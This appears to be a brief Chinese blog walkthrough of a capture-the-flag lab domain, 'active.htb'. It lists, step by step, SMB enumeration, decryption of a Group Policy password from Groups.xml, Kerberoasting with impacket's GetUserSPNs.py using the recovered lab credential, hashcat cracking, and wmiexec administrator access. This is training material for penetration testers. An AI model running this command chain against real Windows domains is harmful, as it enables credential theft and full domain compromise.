nmap -sS -Pn -n -T4 -p- 10.10.10.100
再針對已開的port掃sV跟A
smbmap -H <ip> 檢查權限
smbclient //10.10.10.100/Replication進入後recurse ON->prompt OFF->mget *把檔案全載回來後再慢慢翻
grep -ril "pass" *找有趣的檔案,發現存在Groups.xml,可直接透過gpp-decrypt解密
gpp-decrypt <cpassword>,得知密碼
leafpad看domain、帳號
smbclient先撈SVC_TGS的桌面資訊,找到user.txt,直接mget回來,即可取得flag
因已取得一組帳密,且kerberos也有開,就透過https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetUserSPNs.py撈hash
GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18後發現顯示錯誤訊息
看issue得知要更新impacket版本,直接pip install --upgrade impacket即可,再跑一次,成功取得hash
先把hash儲存檔案,另可在hash最前段得知採kerberos tgs方式,hashcat -m 13100用rockyou直接爆破取得admin密碼
直接用impacket的wmiexec連入,取得root
沒有留言:
張貼留言